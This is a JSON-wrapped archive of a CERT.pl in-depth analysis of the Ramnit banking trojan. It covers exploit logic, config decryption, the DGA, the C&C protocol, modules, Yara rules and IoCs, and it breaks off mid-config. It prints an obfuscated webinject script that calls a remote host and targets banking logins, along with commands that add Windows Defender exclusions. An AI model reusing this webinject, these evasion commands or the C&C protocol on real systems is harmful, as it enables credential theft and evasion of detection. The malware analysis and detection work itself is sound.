{
	"id": "1563f2e4-6c9f-44d2-93ba-e63184ff9853",
	"created_at": "2026-04-06T00:19:43.977559Z",
	"updated_at": "2026-04-10T13:12:07.702472Z",
	"deleted_at": null,
	"sha1_hash": "07ab2a6b2f52f1ef945158544d3b8098a2c5bd8e",
	"title": "Ramnit – in-depth analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 621064,
	"plain_text": "Ramnit – in-depth analysis\r\nArchived: 2026-04-05 19:37:55 UTC\r\nIf we look on Ramnit’s history, it’s hard to exactly pin down which malware family it actually belongs to. One\r\nthing is certain, it’s not a new threat. It emerged in 2010, transferred by removable drives within infected\r\nexecutables and HTML files.\r\nA year later, a more dangerous version was released. It contained a part of recently leaked Zeus source code,\r\nwhich allowed Ramnit to become a banking trojan.\r\nThese days, it has become much more sophisticated by utilizing a number of malicious activities including:\r\nPerforming Man-in-the-Browser attacks\r\nStealing FTP credentials and browser cookies\r\nUsing DGA (Domain Generation Algorithm) to find the C\u0026C (Command and Control) server\r\nUsing privilege escalation\r\nAdding AV exceptions\r\nUploading screenshots of sensitive information\r\nDespite Europol’s shut down of 300 C\u0026C servers in 2015, it’s still going strong, recently being\r\ndistributed by RIG EK via seamless gates.\r\nExecutable’s analysis\r\nThe main binary is packed like a matryoshka – a custom packing method first and then UPX.\r\nDespite being encrypted, extracting the binary from the packer is pretty straight-forward – all one\r\nneeds to do is to set a breakpoint right after the binary decrypts the code and before it jumps into it.\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 1 of 22\n\nAnd if we now navigate to the newly unpacked code section we’ll find the binary right after the loader\r\nassembly:\r\nThe unpacked binary (after UPX decompression) consists of 3 general functions:\r\nApplyExploit\r\nCheckBypassed\r\nstart\r\nApplyExploit\r\nIf the current user is not already an admin and the process is not running with admin privileges it tries\r\nto perform privilege escalation.\r\nMalware contains exploits for CVE-2013-3660 (patched in MS13-053) and CVE-2014-4113 (patched\r\nin MS14-058) vulnerabilities, however before it actually tries to run the payload, registry checks are\r\nperformed to make sure that the host system is indeed vulnerable to said CVEs:\r\nint __cdecl try_to_exploit(LPSTR lpCommandLine)\r\n{\r\nif ( !is_win8() \u0026\u0026 !is_win8_1() )\r\n{\r\nif ( is_xp() )\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 2 of 22\n\n{\r\nif ( !check_updates_xp((int)\"KB3000061\") )\r\n{\r\nif ( is_admin() )\r\nreturn 1;\r\nLABEL_6:\r\nexecute_CVE_2014_4113(lpCommandLine);\r\nreturn 1;\r\n}\r\n}\r\nelse if ( !check_updates_other((int)\"KB3000061\") )\r\n{\r\nif ( is_admin() \u0026\u0026 check_authority() \u003e 1 )\r\nreturn 1;\r\ngoto LABEL_6;\r\n}\r\ntry_second_exploit(lpCommandLine);\r\nreturn 1;\r\n}\r\nreturn 0;\r\n}\r\nvoid __cdecl try_second_exploit(LPCSTR lpCommandLine)\r\n{\r\nbool v1; // al@2\r\nif ( is_xp() )\r\nv1 = check_updates_xp((int)\"KB2850851\");\r\nelse\r\nv1 = check_updates_other((int)\"KB2850851\");\r\nif ( !v1 \u0026\u0026 !get_dir() )\r\n{\r\nexecute_CVE_2013_3660(lpCommandLine);\r\nSleep(500u);\r\n}\r\n}\r\nIf the exploits succeed or the program is already running with high privileges, a “TRUE” value is\r\nstored in a hardcoded random-looking registry key:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\jfghdug_ooetvtgk,\r\nwhich is later used in the CheckBypassed function.\r\nCheckBypassed\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 3 of 22\n\nThis function checks if previously mentioned registry key is set. If not and process has admin\r\nprivileges, updates it. Assuming the exploit has worked, Ramnit then adds registry keys to evade\r\nWindows’ security systems detection (see Obfuscation/Evasion):\r\nsigned int __stdcall CheckBypassed()\r\n{\r\nBYTE Data; // [esp+Ch] [ebp-104h]@7\r\nif ( is_xp() \u0026\u0026 is_admin() )\r\nreturn 4;\r\nif ( is_xp() )\r\nreturn 0;\r\nif ( check_authority() \u003c= 1 )\r\n{\r\nif ( !check_authority()\r\n\u0026\u0026 !RegCheckKey(\r\nHKEY_LOCAL_MACHINE,\r\n\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\",\r\n\"jfghdug_ooetvtgk\",\r\n\u0026Data,\r\n260) )\r\n{\r\nreturn 3;\r\n}\r\nreturn 0;\r\n}\r\nOutputDebugStringA(\"CheckBypassed ok\");\r\nif ( !RegCheckKey(\r\nHKEY_LOCAL_MACHINE,\r\n\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\\",\r\n\"jfghdug_ooetvtgk\",\r\n\u0026Data,\r\n260) )\r\nreturn 2;\r\nRegSetKey(HKEY_LOCAL_MACHINE, \"SOFTWARE\\\\Microsoft\\\\Windows\r\nNT\\\\CurrentVersion\\\\\", \"jfghdug_ooetvtgk\", \"TRUE\", 0);\r\nhide_me_from_defender();\r\nreturn 1;\r\n}\r\nstart routine\r\nThe routine coordinates ApplyExploit and CheckBypassed – if they both run successfully it creates two\r\nsvchost.exe processes and writes rmnsoft.dll and modules.dll into them respectively.\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 4 of 22\n\nImportant detail: the binary executes CheckBypassed before ApplyExploit, so the binary has to be\r\nexecuted again in order to make any further progress. This trick outsmarts many single-run malware\r\nanalysis systems, such as Cuckoo.\r\nStatic config\r\nRamnit encrypts its network communication using RC4 algorithm. Key for RC4 and botnet name are\r\nencrypted using xor with a hardcoded password.\r\nXOR encryption is pretty standard, the only catch is that it skips key’s first char and then reverses the\r\nkey.\r\nvoid __stdcall xor(char *input, int input_length, char *xor_secret, int xor_secret_length)\r\n{\r\nint v4; // ecx@3\r\nchar *v5; // edi@3\r\nint v6; // edx@3\r\nif ( input_length \u0026\u0026 xor_secret_length )\r\n{\r\nv4 = input_length;\r\nv5 = input;\r\nv6 = 0;\r\ndo\r\n{\r\nif ( !v6 )\r\nv6 = xor_secret_length - 1;\r\n*v5 ^= xor_secret[v6];\r\n++v5;\r\n--v6;\r\n--v4;\r\n}\r\nwhile ( v4 );\r\n}\r\n}\r\nXOR function calls:\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 5 of 22\n\nxor(\u0026botnet_name, 110, (char *)\u0026xor_secret, xor_secret_length);\r\nxor(\u0026rc4_key, 59, (char *)\u0026xor_secret, xor_secret_length);\r\nCiphertext lengths are almost always too long and we have to rely on null termination:\r\n\u003e\u003e\u003e xor_key = \"1\\x8F\\x31\\xCD\\x95\"\r\n\u003e\u003e\u003e rc4_key_encrypted = \"\\xF3\\xA8\\x5F\\xFE\\xE0\\xB4\\x58\\xEB\\xFD\\xCD\"\r\n\u003e\u003e\u003e crypto.xor(rc4_key_encrypted, xor_key[1:][::-1])\r\n'fenquyidh\\x00'\r\nDGA config seems to be always declared at the beginning of the data section:\r\nPersistence\r\nProgram copies itself into C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\.\r\nDGA\r\nRamnit generates a list of domains by using a LCG algorithm with a hardcoded seed:\r\nunsigned int __stdcall rand_int(unsigned int seed, unsigned int mod)\r\n{\r\nreturn (16807 * (seed % 0x1F31D) - 2836 * (seed / 0x1F31D)) % mod;\r\n}\r\nGenerating a domain:\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 6 of 22\n\nDGA recreated in Python:\r\ndef dga(seed):\r\ndomain = \"\"\r\ndomain_length, new_seed = rng(seed, 12)\r\ndomain_length += 8\r\nseed_after_length = new_seed\r\nfor i in range(domain_length):\r\nc, new_seed = rng(new_seed, 25)\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 7 of 22\n\ndomain += chr(c + ord('a'))\r\n# multiply original seed and seed after getting random length\r\nseed *= seed_after_length\r\n# add together lower and higher 32 bits of product of multiplication\r\nseed = ((seed \u003e\u003e 32) + (seed \u0026 0xffffffff)) \u0026 0xffffffff\r\ndomain += \".com\"\r\nreturn domain, seed\r\nCommunication\r\nRamnit connects to C\u0026C servers through port 443, but don’t let that fool you – it doesn’t use HTTPS,\r\nbut its own protocol instead:\r\nPacket’s structure:\r\nstruct packet {\r\nbyte[2] magic; // set to \"\\x00\\xff\"\r\ndword packet_data_length;\r\nbyte command;\r\nbyte[packet_data_length] data;\r\n}\r\nChunks’ structures:\r\nstruct chunk_0 {\r\nbyte magic; // set to \"\\x00\"\r\ndword data_size;\r\nbyte[data_size] data; // encrypted using rc4\r\n}\r\nstruct chunk_1 {\r\nbyte magic; // set to \"\\x01\"\r\ndword data;\r\n}\r\nstruct chunk_2 {\r\nbyte magic; // set to \"\\x0\"2\r\ndword data_1;\r\ndword data_2;\r\n}\r\nSo if we’d like to send a packet containing some data, we would:\r\nencrypt large (\u003e4bytes) chunk data using RC4 with a key recovered from the XOR decryption\r\ncreate packed chunks from data parts\r\nconcatenate all chunks together\r\nwrap the output in packet layer\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 8 of 22\n\nTraffic example:\r\nSome of available commands:\r\nCommand\r\nByte\r\nValue\r\nShort Description\r\nCOMMAND_OK 0x01\r\nServer’s response that the command\r\nexecuted successfully\r\nGET_DNSCHANGER 0x11 Get DNS-changer payload\r\nGET_INJECTS 0x13 Get webinjects\r\nUPLOAD_COOKIES 0x15 Upload stolen cookies (zip format)\r\nGET_MODULE 0x21 Get a specific module\r\nGET_MODULE_LIST 0x23 Get a list of downloadable modules\r\nVERIFY_HOST 0x51\r\nCheck if the host is able to send a signed\r\nmessage\r\nREGISTER_BOT 0xe2 Register bot (send two MD5s)\r\nUPLOAD_INFO_GET_COMMANDS 0xe8 Upload detailed machine info\r\nBot registration\r\nWhen a bot wants to register itself it sends two encrypted md5 hashes, the data structure of which is\r\nfollowing:\r\nstruct MD5_1_data {\r\nDWORD VolumeSerialNumber\r\nDWORD VersionInformation.dwBuildNumber;\r\nDWORD VersionInformation.dwMajorVersion;\r\nDWORD VersionInformation.dwMinorVersion;\r\nWORD SystemInfo.u.s.wProcessorArchitecture;\r\nDWORD SystemInfo.dwActiveProcessorMask;\r\nDWORD SystemInfo.dwNumberOfProcessors;\r\nDWORD SystemInfo.dwProcessorType;\r\nWORD SystemInfo.wProcessorLevel;\r\nWORD SystemInfo.wProcessorRevision;\r\nBYTE[16] ComputerName\r\n}\r\nstruct MD5_2_data {\r\nBYTE[8] magic_const; // set to \"45Bn99gT\"\r\nBYTE[32] MD5_1;\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 9 of 22\n\n}\r\nPython code:\r\nMD5_1 = \"f054bbd2f5ebab9cb5571000b2c50c02\"\r\nMD5_2 = hashlib.md5(\"45Bn99gT\"+MD5_1).hexdigest()\r\nIf C\u0026C responds with a success packet (00ff0100000001), malware follows up with a empty 0x51\r\ncommand. Signature from the response is verified using a hardcoded public RSA key. If there is a\r\nmismatch – the execution stops.\r\nModules\r\nThe program can request a list of modules and then download each one individually:\r\nAntivirus Trusted Module v2.0\r\nAdds exceptions to a fixed list of anti-virus software (AVG Anti-Virus, BitDefender, Avast, ESET\r\nNOD32 Antivirus, Norton AntiVirus)\r\nChrome reinstall module (x64-x86) v0.1\r\nUninstalls Google Chrome\r\n%programfiles(x86)%\\\\Google\\\\Chrome\\\\Application\\\\%s\\\\Installer\\\\setup.exe --uninstall --\r\nmulti-install --chrome --system-level --force-uninstall\r\nand installs it again:\r\nhttps://dl.google.com/tag/s/appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={9D8A3851-D347-A540-6FC8-\r\n7438A91AB637}\u0026lang=en\u0026browser=4\u0026usagestats=0\u0026appname=Google%20Chrome\u0026needsadmin=false/update2/installers/Chrom\r\nCookie Grabber v0.2 (no mask)\r\nSteals cookies from various hardcoded locations and sends a zip with results to the C\u0026C through\r\nrmnsoft.dll.\r\nHooker\r\nUsed for performing Man-in-the-Browser attacks and hooking HTTP functions.\r\nWebinjects\r\nWebinjects are a relatively new addition to Ramnit. They utilize a standard Zeus format:\r\nentry \"WebFilters\"\r\nhttps*\r\nend\r\nentry \"WebDataFilters\"\r\nhttps*\r\nend\r\nset_url https://REDACTED* GP\r\ndata_before\r\n\u003cbod*\u003e\r\ndata_end\r\ndata_inject\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 10 of 22\n\n\u003cscript id=\"loader\" type=\"text/javascript\"\u003e\r\ndocument.body.style.display = \"none\";\r\n(function() {\r\nvar _0x7f7f = [\"\\x53\\x43\\x52\\x49\\x50\\x54\",\r\n\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\", \"\\x3F\\x72\\x61\\x6E\\x64\\x3D\",\r\n\"\\x72\\x61\\x6E\\x64\\x6F\\x6D\", \"\\x26\",\r\n\"\\x61\\x6A\\x61\\x78\\x5F\\x72\\x65\\x61\\x64\\x79\\x53\\x74\\x61\\x74\\x65\",\r\n\"\\x6F\\x6E\\x6C\\x6F\\x61\\x64\",\r\n\"\\x6F\\x6E\\x72\\x65\\x61\\x64\\x79\\x73\\x74\\x61\\x74\\x65\\x63\\x68\\x61\\x6E\\x67\\x65\",\r\n\"\\x73\\x72\\x63\", \"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\r\n\"\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65\", \"\\x73\\x63\\x72\\x69\\x70\\x74\",\r\n\"\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65\",\r\n\"\\x72\\x65\\x61\\x64\\x79\\x53\\x74\\x61\\x74\\x65\", \"\\x6C\\x6F\\x61\\x64\\x65\\x64\",\r\n\"\\x63\\x6F\\x6D\\x70\\x6C\\x65\\x74\\x65\", \"\\x61\\x70\\x70\\x6C\\x79\",\r\n\"\\x72\\x65\\x6D\\x6F\\x76\\x65\\x43\\x68\\x69\\x6C\\x64\",\r\n\"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4A\\x4B\\x4C\\x4D\\x4E\\x4F\\x50\",\r\n\"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5A\\x61\\x62\\x63\\x64\\x65\\x66\",\r\n\"\\x67\\x68\\x69\\x6A\\x6B\\x6C\\x6D\\x6E\\x6F\\x70\\x71\\x72\\x73\\x74\\x75\\x76\",\r\n\"\\x77\\x78\\x79\\x7A\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x2B\\x2F\", \"\\x3D\", \"\",\r\n\"\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\", \"\\x63\\x68\\x61\\x72\\x41\\x74\",\r\n\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\", \"\\x66\\x72\\x6F\\x6D\\x43\\x68\\x61\\x72\\x43\\x6F\\x64\\x65\",\r\n\"\\x6C\\x65\\x6E\\x67\\x74\\x68\"];\r\nfunction sendScriptRequest(_0xade3x2, _0xade3x3, _0xade3x4, _0xade3x5) {\r\nvar _0xade3x6 = document[_0x7f7f[1]](_0x7f7f[0]);\r\nif (_0xade3x3) {\r\n_0xade3x3 = _0x7f7f[2] + Math[_0x7f7f[3]]() + _0x7f7f[4] + _0xade3x3;\r\n} else {\r\n_0xade3x3 = _0x7f7f[2] + Math[_0x7f7f[3]]();\r\n};\r\n_0xade3x6[_0x7f7f[5]] = false;\r\n_0xade3x6[_0x7f7f[6]] = scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5);\r\n_0xade3x6[_0x7f7f[7]] = scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5);\r\n_0xade3x6[_0x7f7f[8]] = _0xade3x2 + _0xade3x3;\r\ndocument[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);\r\n};\r\nfunction scriptCallback(_0xade3x6, _0xade3x4, _0xade3x5) {\r\nreturn function() {\r\nif (_0xade3x6[_0x7f7f[5]]) {\r\nreturn;\r\n};\r\nif (!_0xade3x6[_0x7f7f[13]] || _0xade3x6[_0x7f7f[13]] == _0x7f7f[14] ||\r\n_0xade3x6[_0x7f7f[13]] == _0x7f7f[15]) {\r\n_0xade3x6[_0x7f7f[5]] = true;\r\n_0xade3x4[_0x7f7f[16]](_0xade3x6, _0xade3x5);\r\n_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);\r\n};\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 11 of 22\n\n};\r\n};\r\nfunction decode64(_0xade3x9) {\r\n...\r\n};\r\nvar bn = \"US_\" + \"CHASE_2\";\r\nvar bot_id = \"\u003c%IDBOT%\u003e_\" + bn;\r\nvar sa = decode64(\"aHR0cHM6Ly9jaGFzZWRlZC53ZWJzaXRlL2FkbTEyL2kucGhw\");\r\nvar req = \"send=0\u0026u_bot_id=\" + bot_id + \"A\u0026bn=\" + bn +\r\n\"\u0026page=0\u0026u_login=\u0026u_pass=\u0026log=\" + 'get_me_core';\r\nsendScriptRequest(sa, req, function statusCall1() {\r\nvar element = document.getElementById(\"loader\");\r\nelement.parentNode.removeChild(element);\r\n});\r\n})();\r\n\u003c/script\u003e\r\ndata_end\r\nObfuscation / Evasion\r\nRamnit attempts to hide itself from Windows Defender by adding following registry values:\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Extensions \\\" /v *.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Extensions \\\" /v *.dll /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Extensions \\\" /v *.tmp /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v afwqs.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v rgjdu.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v explorer.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v spoolsv.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v rundll32.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v consent.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Microsoft\r\nAntimalware\\\\Exclusions\\\\Processes \\\" /v svchost.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Extensions \\\" /v *.exe /t REG_DWORD /d 0 \");\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 12 of 22\n\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Extensions \\\" /v *.dll /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Extensions \\\" /v *.tmp /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v afwqs.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v rgjdu.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v explorer.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v spoolsv.exe /t REG_DWORD /d 0 \");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v rundll32.exe /t REG_DWORD /d 0\");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v consent.exe /t REG_DWORD /d 0\");\r\nshell_execute(\"REG ADD \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\r\nDefender\\\\Exclusions\\\\Processes \\\" /v svchost.exe /t REG_DWORD /d 0 \");\r\n‘NOPs’ are inserted in random functions, which makes them difficult to find using e.g. Yara rule:\r\nNew variant\r\nDuring writing of this article we’ve noticed a variation of Ramnit called clickbideu in an Italian spam\r\ncampaign.\r\nIts loader is completely different, but the communication module (rmnsoft.dll) has remained somewhat\r\nunchanged with only some minor differences:\r\nDGA cycles between 3 hardcoded TLDs instead of just one:\r\nint char* add_tld(int tld_no)\r\n{\r\nconst char *v1;\r\nint result;\r\nint v3;\r\nv3 = 0;\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 13 of 22\n\nv1 = a_click; // \".click\", \".bid\", \".eu\"\r\nwhile ( v3 != tld_no )\r\n{\r\nresult = strlen(v1);\r\nv1 += result + 1;\r\nif ( !*v1 )\r\nreturn result;\r\n++v3;\r\n}\r\nreturn v1;\r\n}\r\nPython implementation:\r\ntlds = ['.click', '.bid', '.eu']\r\ndomains = []\r\nfor i in range(domain_no):\r\ndomain, dga_seed = gen_domain(dga_seed)\r\ndomain += tlds[i % len(tlds)]\r\ndomains.append(domain)\r\nAlso new version seems to be using different port – 8001, although we’ve also seen usage of port 442.\r\nAdditionally, a different value (“fE4hNy1O”) is used for calculating the second md5.\r\nAdditional links\r\nhttps://www.virusbulletin.com/virusbulletin/2012/11/ramnit-bot\r\nhttps://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-\r\nramnit-analysis-15-en.pdf\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/ramnit-comeback-story-2016/\r\nIoCs\r\nYara rules:\r\nimport \"pe\"\r\nrule ramnit_general {\r\nmeta:\r\nauthor = \"nazywam\"\r\nmodule = \"ramnit\"\r\nstrings:\r\n$guid = \"{%08X-%04X-%04X-%04X-%08X%04X}\"\r\n$md5_magic_1 = \"15Bn99gT\"\r\n$md5_magic_2 = \"1E4hNy1O\"\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 14 of 22\n\n$init_dga = { C7 ?? ?? ?? ?? ?? FF FF FF FF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ??\r\n?? E8 ?? ?? ?? ?? 0B C0 75 ?? }\r\n$xor_secret = { 8A ?? ?? 32 ?? 88 ?? 4? 4? E2 ?? }\r\n$init_function = { FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68\r\n[4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 }\r\n$dga_rand_int = { B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 }\r\n$cookies = \"\\\\cookies4.dat\"\r\n$s3 = \"pdatesDisableNotify\"\r\n$get_domains = { a3 [4] a1 [4] 80 3? 00 75 ?? c7 05 [4] ff ff ff ff ff 35 [4] ff 35 [4] ff 35 [4] e8\r\n}\r\n$add_tld = { 55 8B EC 83 ?? ?? 57 C7 ?? ?? 00 00 00 00 B? ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 75\r\n?? 8B ?? }\r\n$get_port = { 90 68 [4] 68 [4] FF 35 [4] FF 35 [4] E8 [4] 83 }\r\ncondition:\r\n$init_dga and $init_function and 2 of ($guid, $md5_magic_*, $cookies, $s3) and any of (\r\n$get_port, $add_tld, $dga_rand_int, $get_domains, $xor_secret)\r\n}\r\nrule ramnit_dll {\r\nmeta:\r\nauthor = \"nazywam\"\r\nmodule = \"ramnit\"\r\ncondition:\r\npe.characteristics and pe.DLL and ramnit_general\r\n}\r\nrule ramnit_injector {\r\nmeta:\r\nauthor = \"nazywam\"\r\nmodule = \"ramnit\"\r\nstrings:\r\n$unpack_dlls = { B8 [4] 50 E8 [4] A3 [4] 68 [4] 68 [4] FF [5] E8 [4] B8 [4] 50 E8 [4] A3 [4]\r\n68 [4] 68 [4] FF [5] E8 }\r\ncondition:\r\n$unpack_dlls and ramnit_general\r\n}\r\nSamples analyzed:\r\nMain PE\r\nhttps://www.cert.pl/en/news/single/ramnit-in-depth-analysis/\r\nPage 15 of 22\n\n92460d8ac1d1e9f155ef2ca6dd7abb417df8900a17e95157d4372a2c846e829f\r\nrmnsoft.dll\r\nbe2044fe6f0220dde12c51677f2ef4c45d9dea669073bd052695584e573629e0\r\nmodules.fll\r\n96a10e07d092f6f429672ce2ca66528aae19de872bda39249135a82477d27a83\r\nModule Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)\r\n975ed0f933d4a22ca631c5ab77c765cd46c48511d43326b066b4505c6dc911de\r\nModule Cookie Grabber v0.2 (no mask)\r\nbc977a0f455fc747a7868a7940aa98af10c91c4aae7598310de8b78132436bee\r\nModule Hooker\r\na88151b3bf825e26ded28f94addeada095d2cd13791b2153a9594b26d9cfb85e\r\nConfigs:\r\n\"{'config_type': 10,'dga_seed': 790544302, 'harcoded_domain': '', 'dga_domain_no': 40,\r\n'rc4_key': 'fB1oN5frGqf', 'config_magic': '26', 'dga_tlds': ['.click', '.bid', '.eu'], 'md5_magic':\r\n'fE4hNy1O', 'port': 8001}\"\r\n\"{'config_type': 15,'dga_seed': 1124253770, 'harcoded_domain': 'oqdmeolksujhud.click',\r\n'dga_domain_no': 10, 'rc4_key': 'fB1oN5frGqf', 'config_magic': '3', 'dga_tlds': ['.click', '.bid',\r\n'.eu'], 'md5_magic': 'fE4hNy1O', 'port': 442}\"\r\n\"{'config_type': 7, 'dga_seed': 1108585239, 'dga_domain_no': 50, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'ujdnnaaah61996y.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 1458440109, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'atw82ye63ymdp.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2039546858, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'doisafjsnbjesfbejfbkjsej88.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2435699865, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'b18w187yebsoi.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2695420049, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'funtikmuntiktribakaka9.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 2960547961, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'seo4', 'harcoded_domain':\r\n'dakdji282euijdsnkdlks.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3738229229, 'dga_domain_no': 15, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'test', 'harcoded_domain':\r\n'mudsaoojbjijj999.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3801515385, 'dga_domain_no': 10, 'md5_magic': '45Bn99gT',\r\n'rc4_key': 'fenquyidh', 'port': 443, 'config_magic': 'demetra', 'harcoded_domain':\r\n'hdyejdn638ir8.com'}\"\r\n\"{'config_type': 7, 'dga_seed': 3815882521, 'dga_domain_no': 10, 'md5_magic': 